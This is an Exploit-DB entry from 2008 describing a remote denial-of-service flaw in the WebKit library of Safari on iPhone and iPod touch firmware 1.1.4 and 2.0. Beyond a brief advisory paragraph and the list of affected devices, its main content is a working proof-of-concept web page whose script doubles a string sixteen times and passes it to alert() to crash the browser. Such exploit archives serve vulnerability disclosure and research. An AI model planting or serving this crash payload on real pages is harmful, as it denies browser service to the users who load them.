Apple iOS 1.1.4/2.0 / iPod 1.1.4/2.0 touch Safari WebKit - 'alert()' Remote Denial of Service

EDB-ID:

32341




Platform:

Hardware

Date:

2008-09-12


source: https://www.securityfocus.com/bid/31061/info

Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser.

Remote attackers can exploit this issue to crash the affected browser installed on the devices, denying service to legitimate users.

The following devices and corresponding firmware are affected:

iPhone 1.1.4 and 2.0
iPod touch 1.1.4 and 2.0

<html> <body> <form> <script type="text/javascript" language="JavaScript"> var st = "A"; alert ( "Crashing Safari on iPhone..." ); for ( var d = 1 ; d <= 16 ; d ++ ) { st += st; } alert ( st ); </script> </form> </body> </html>